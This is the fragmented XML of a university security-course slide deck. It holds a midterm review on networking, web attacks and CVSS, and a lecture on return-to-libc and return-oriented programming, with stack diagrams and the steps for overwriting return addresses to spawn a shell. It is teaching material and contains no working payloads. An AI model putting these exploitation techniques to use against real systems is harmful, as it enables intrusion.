              <a:t>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Transport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TCP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UDP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Know the basics of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Internet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IP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IPv4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ICMP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Link layer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ARP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Know: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the ARP cache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will require just a bit of extra research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ARP spoofing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MITM with ARP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Internet routing + security mechanisms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Know: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Firewalls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NAT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IDS / IPS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WAF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Stateful firewalls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1730374" x="457200"/>
            <a:ext cy="4837499" cx="410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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>stateless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UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>stateless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TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>stateful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Can still check for </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" lang="en"/>
              <a:t>protocol noncompliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> on stateless protocols</a:t>
            </a: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4250" x="4701012"/>
            <a:ext cy="5236373" cx="432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TCP State model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97924" x="2666999"/>
            <a:ext cy="543560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Deep Packet Inspection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Know how to defeat it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Know what's required to be able to defeat it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 Hacking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Focus on WAH pages: 23-29, 35, 64, 66-70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/>
              <a:t>multistep validation and canonicalization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attacks against admin features / application management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same origin policy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various encoding schemes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application Hacking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Skim 53-57.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 aware of the various server-side technologies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Know the basics of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SQLi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XSS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Reverse Engineering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Won't directly be testing on the midterm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 assess your RE skills on the homeworks throughout the course really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Vulnerability Scoring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Common Vulnerability Scoring System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http://www.first.org/cvss#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/>
              <a:t>Six Base metrics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (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http://www.first.org/cvss/faq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>):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n"/>
              <a:t>Access Vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: how well can a remote attack attack the target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n"/>
              <a:t>Access Complexity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the complexity of the attack required to exploit the vuln, once he has gained access to the target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n"/>
              <a:t>Authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the number of times an attacker must authenticate to the target system, in order to exploit the vuln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n"/>
              <a:t>Confidentiality Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to confidentiality if the vulnerability is successfully exploited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n"/>
              <a:t>Availability Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to availability if the vulnerability is successfully exploited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n"/>
              <a:t>Integrity Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Measures the damage to the integrity of data and systems if the vulnerability is successfully exploited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There are also Temporal, and Environmental metrics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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability Scoring is important for prioritizing incident response, and for system administrators to  prioritize proactive security measures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to expect on the Midterm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True false questions on concepts, similar to homeworks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majority (~80%) of questions test your understanding of concepts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(10-20%) test your ability to apply the concepts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150" x="4895850"/>
            <a:ext cy="6667500" cx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26546" x="-95681"/>
            <a:ext cy="7410245" cx="926260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y="2121000" x="3042275"/>
            <a:ext cy="695999" cx="600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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Exploit Development 105</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Shape 499"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="544686">
            <a:off y="3568775" x="1907905"/>
            <a:ext cy="696015" cx="714155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Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Return-Oriented Programming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 Oriented Programming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Exploitation technique used to defeat DEP / NX &amp; code signing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related to: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return to library exploitation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ret2libc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SEH exploitation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POP RET sequences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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="6435175" x="2114125"/>
            <a:ext cy="391800" cx="70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200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Source: http://blog.zynamics.com/2010/03/12/a-gentle-introduction-to-return-oriented-programming/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to lib c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 i="1"/>
              <a:t>Usually the stack is </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" b="1" sz="2400" lang="en" i="1"/>
              <a:t>not executable (NX)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en" i="1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Can't use shellcode on the stack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no code injection!  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2400" lang="en"/>
              <a:t>D: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still control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EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(by overriding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RET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>value on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> the stack)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can point it elsewhere and still spawn a shell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can point to dynamic-link library code!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must be a common dynamic library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must allow attacker to be flexible, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>and spawn shell or w/e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="3" indent="-342900" marL="18288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libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>!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Basic planning process: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Determine address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/>
              <a:t>()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determine address of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/bin/sh" in memory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determine address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/>
              <a:t>()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y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="180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vuln buffer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stack data .....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EBP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ret addr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argument1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argument2 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1" name="Shape 521"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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2" name="Shape 522"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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3" name="Shape 523"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4074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4" name="Shape 524"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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5" name="Shape 525"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="49887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26" name="Shape 526"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="137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THE STACK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y="55867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HIGH MEMORY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y="22339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LOW MEMORY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to lib c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Basic execution of exploit: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fill up the vulnerable buffer up to the return address with garbage data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overwrite the return address with the address of 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sz="2400" lang="en"/>
              <a:t>()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follow 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sz="2400" lang="en"/>
              <a:t>() with the address of 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sz="2400" lang="en"/>
              <a:t>()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append the address of  "</a:t>
            </a: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/bin/sh"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Its simple and sweet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When function calls happen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general,    CALL function_name   does the following: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pushes in order on the stack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-29845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first the arguments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-29845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then return address </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="-29845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then base pointer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y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="180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vuln buffer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stack data .....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EBP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ret addr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argument1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argument2 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2" name="Shape 542"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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3" name="Shape 543"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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4" name="Shape 544"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4074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5" name="Shape 545"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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6" name="Shape 546"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="49887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47" name="Shape 547"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="137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THE STACK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y="55867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HIGH MEMORY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y="22339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LOW MEMORY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Shape 554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4093800" x="8700800"/>
            <a:ext cy="1376275" cx="209925"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="8397" extrusionOk="0" h="55051">
                <a:moveTo>
                  <a:pt y="0" x="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="7931" x="8397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="45254" x="8397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="55051" x="466"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat">
            <a:solidFill>
              <a:schemeClr val="accent3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555" name="Shape 55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to lib c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Hurdles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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finding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/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" in memory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not uncommon, and can be found  with </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a memory analyzer (i.e. memfetch)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can be an environment variable!   :D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figuring out how to pass it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/>
              <a:t>()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arguments get pushed onto the stack in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reverse order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pass a pointer to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/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" or put it there?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usually easier to pass a pointer!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0" indent="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr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getting the vulnerable process to exit cleanly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/>
              <a:t>()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/>
              <a:t>() returns, it will point here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="180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garbage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garbage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garbage data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system() addr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exit() addr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/bin/sh addr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8" name="Shape 558"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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9" name="Shape 559"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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0" name="Shape 560"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4074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1" name="Shape 561"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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2" name="Shape 562"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="49887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63" name="Shape 563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="137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THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="564" name="Shape 564"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="4793625" x="6053225"/>
            <a:ext cy="1037999" cx="839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5" name="Shape 565"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2135150" x="6659725"/>
            <a:ext cy="886500" cx="349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6" name="Shape 566"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1649975" x="5913275"/>
            <a:ext cy="489899" cx="178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 NOP's cause not executable!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off y="4445249" x="7469975"/>
            <a:ext cy="1364699" cx="166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12 bytes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y="55867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HIGH MEMORY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y="22339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LOW MEMORY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Stack Overflows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 linux and windows, with single-threaded applications with a static stack base address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Shape 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4589200" x="773450"/>
            <a:ext cy="752700" cx="7744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NOP NOP NOP NOP NOP......	NOP NOP NOP	shellcode				ret address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y="4589200" x="4898575"/>
            <a:ext cy="763200" cx="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4" name="Shape 294"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4589200" x="7184575"/>
            <a:ext cy="763200" cx="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95" name="Shape 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3970425" x="1619100"/>
            <a:ext cy="783775" cx="6290800"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="251632" extrusionOk="0" h="31351">
                <a:moveTo>
                  <a:pt y="31351" x="251632"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt y="0" x="233482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="825" x="3300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt y="31351" x="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28575" cap="flat">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dashDot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Inside system()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system(const char *command)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="576" name="Shape 576"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2783488" x="6879000"/>
            <a:ext cy="2682600" cx="180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....</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr rtl="0" lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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exit() addr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/bin/sh addr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7" name="Shape 577"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3312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8" name="Shape 578"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3693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9" name="Shape 579"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="40743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0" name="Shape 580"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="45315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1" name="Shape 581"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4988775" x="6881325"/>
            <a:ext cy="0" cx="18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82" name="Shape 582"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2484275" x="7336200"/>
            <a:ext cy="256500" cx="137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THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="583" name="Shape 583"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="4222100" x="5645025"/>
            <a:ext cy="513300" cx="1236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4" name="Shape 584"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3908937" x="4805275"/>
            <a:ext cy="431700" cx="172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 Value</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="585" name="Shape 585"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off y="5225024" x="5866625"/>
            <a:ext cy="326700" cx="1014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6" name="Shape 586"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="5335550" x="4835600"/>
            <a:ext cy="384899" cx="151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y="55867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HIGH MEMORY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y="2233900" x="6904650"/>
            <a:ext cy="326700" cx="157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LOW MEMORY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 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="594" name="Shape 59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to lib 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Goto slides @ the end to see walkthroughs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Exploitation Difficulty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2924" x="564900"/>
            <a:ext cy="5314950" cx="78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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="1361275" x="2041925"/>
            <a:ext cy="680699" cx="587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Source: </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng" sz="1200" lang="en">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.trailofbits.com/resources/the_future_of_exploitation_slides.pdf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Return-Oriented Programming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Conceived in 2004 by Sebastian Krahmer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http://users.suse.com/~krahmer/no-nx.pdf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Introduced as an academic paper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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" by Hovav Sacham in 2007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http://cseweb.ucsd.edu/~hovav/dist/geometry.pdf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Key lesson: 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Preventing the introduction of malicious code, is NOT enough for preventing the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution of malicious computations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Return-Oriented Programming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Expands attack vectors for return-to-* techniques, by introducing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control branches / structures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loops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return-into-library techniques have no support for conditional branching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removal of functions from libraries provides zero security against ROP, but can defeat return-into-library techniques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Theory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u="sng" lang="en"/>
              <a:t>linked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> binary executables, the calling conventions for functions may be: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cdecl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originates from C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Args pushed on the stack right to left (reverse order)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Calling function cleans up stack (push call pop)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stdcall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originates from Microsoft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Args pushed on stack right to left (reverse order)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Called function cleans up stack (pop pop ret)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fastcall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...Theory</a:t>
            </a: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We're going to use </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>cdecl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>convention for this lecture.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function calling theory</a:t>
            </a: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u="sng" lang="en"/>
              <a:t>linked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> binary executables, the function call syntax is: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$arg2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$arg1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function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="633" name="Shape 633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2629750" x="6125800"/>
            <a:ext cy="4382999" cx="28565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Saved EIP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(RET VALUE)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FUNCTION local vars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function calling theory</a:t>
            </a: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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="820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Because the RET instruction is so similar to POP EIP we can call functions in this way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$arg2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$arg1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pointer to function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Thats if we had pure W+X ASM capability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 to libc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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="634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instead of overwriting RET address on stack to point to shellcode, reuse existing library code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simulate function call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Data from attacker's controlled buffer on stack are used as function's args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system(command)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defeats non-executable stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="646" name="Shape 646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2629750" x="6125800"/>
            <a:ext cy="4382999" cx="28565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 1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&amp;exit()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&lt;RET value for system()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&amp;system()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lang="en"/>
              <a:t>(RET Value)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Format string bugs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Know how to leak memory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Know how to write arbitrary values to arbitrary locations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beyond ret-2-libc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y="1730374" x="457200"/>
            <a:ext cy="4837499" cx="6172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problem here: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Say we wanted to do something after system(), instead of exit().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function1, then function 2, then 3, ....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would have to clean up the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="653" name="Shape 653"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="2629750" x="6125800"/>
            <a:ext cy="4382999" cx="28565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ARG 2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--------------------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ARG 1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&amp;exit()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&lt;RET value for system()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&amp;system()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lang="en"/>
              <a:t>(RET Value)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.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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 Chaining Theory</a:t>
            </a:r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Stack unwinds upwards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be used to call a chain of functions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First function must return into code to advance the stack pointer over to function 2's arguments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pop pop ret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assumes using cdecl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="660" name="Shape 660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Function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0x0043a82F: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667" name="Shape 667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&amp;Function 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"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0x780DFFFC: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....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668" name="Shape 668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3379161" x="1763475"/>
            <a:ext cy="1426600" cx="4743900"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="189756" extrusionOk="0" h="57064">
                <a:moveTo>
                  <a:pt y="12926" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="10794" x="6669"/>
                  <a:pt y="688" x="23307"/>
                  <a:pt y="138" x="40014"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="-412" x="56720"/>
                  <a:pt y="2337" x="84771"/>
                  <a:pt y="9625" x="100241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="16912" x="115710"/>
                  <a:pt y="35957" x="117909"/>
                  <a:pt y="43864" x="132829"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="51770" x="147748"/>
                  <a:pt y="54864" x="180268"/>
                  <a:pt y="57064" x="189756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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="669" name="Shape 669"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3444475" x="4331375"/>
            <a:ext cy="525900" cx="215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equivalent to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POP EIP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y="5482825" x="1178725"/>
            <a:ext cy="946499" cx="419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lang="en" i="1"/>
              <a:t>This example is cdecl based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677" name="Shape 677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</a:rPr>
              <a:t>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684" name="Shape 684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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Saved EBP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</a:rPr>
              <a:t>....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691" name="Shape 691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</a:rPr>
              <a:t>Saved EBP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698" name="Shape 698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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Saved EBP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699" name="Shape 699"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3949465" x="2072875"/>
            <a:ext cy="2357025" cx="4413875"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="176555" extrusionOk="0" h="94281">
                <a:moveTo>
                  <a:pt y="74677" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="77427" x="6393"/>
                  <a:pt y="88290" x="24956"/>
                  <a:pt y="91178" x="38363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="94065" x="51769"/>
                  <a:pt y="95853" x="70057"/>
                  <a:pt y="92003" x="80439"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="88152" x="90820"/>
                  <a:pt y="81071" x="98040"/>
                  <a:pt y="68077" x="100653"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="55082" x="103265"/>
                  <a:pt y="25313" x="94258"/>
                  <a:pt y="14038" x="96115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="2762" x="97971"/>
                  <a:pt y="1662" x="103539"/>
                  <a:pt y="425" x="111790"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="-812" x="120040"/>
                  <a:pt y="1044" x="134821"/>
                  <a:pt y="6613" x="145616"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="12182" x="156410"/>
                  <a:pt y="29301" x="171398"/>
                  <a:pt y="33839" x="17655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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="700" name="Shape 700"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3244525" x="4950125"/>
            <a:ext cy="690899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equivalent to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MOV SP, BP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POP BP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707" name="Shape 707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</a:rPr>
              <a:t>...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708" name="Shape 708"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3841089" x="1691300"/>
            <a:ext cy="2592150" cx="4785125"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="191405" extrusionOk="0" h="103686">
                <a:moveTo>
                  <a:pt y="99225" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="99637" x="13750"/>
                  <a:pt y="107062" x="63045"/>
                  <a:pt y="101700" x="82502"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="96337" x="101958"/>
                  <a:pt y="81556" x="110209"/>
                  <a:pt y="67050" x="116741"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="52543" x="123272"/>
                  <a:pt y="25798" x="117772"/>
                  <a:pt y="14661" x="121691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="3523" x="125609"/>
                  <a:pt y="-670" x="128635"/>
                  <a:pt y="223" x="140254"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt y="1116" x="151873"/>
                  <a:pt y="16723" x="182879"/>
                  <a:pt y="20023" x="191405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0x740109FC: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 edi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pop ebp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715" name="Shape 715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</a:rPr>
              <a:t>...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716" name="Shape 716"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off y="3036100" x="1669850"/>
            <a:ext cy="1162150" cx="4813100"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path w="192524" extrusionOk="0" h="46486">
                <a:moveTo>
                  <a:pt y="31075" x="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt y="33575" x="7620"/>
                  <a:pt y="44767" x="28039"/>
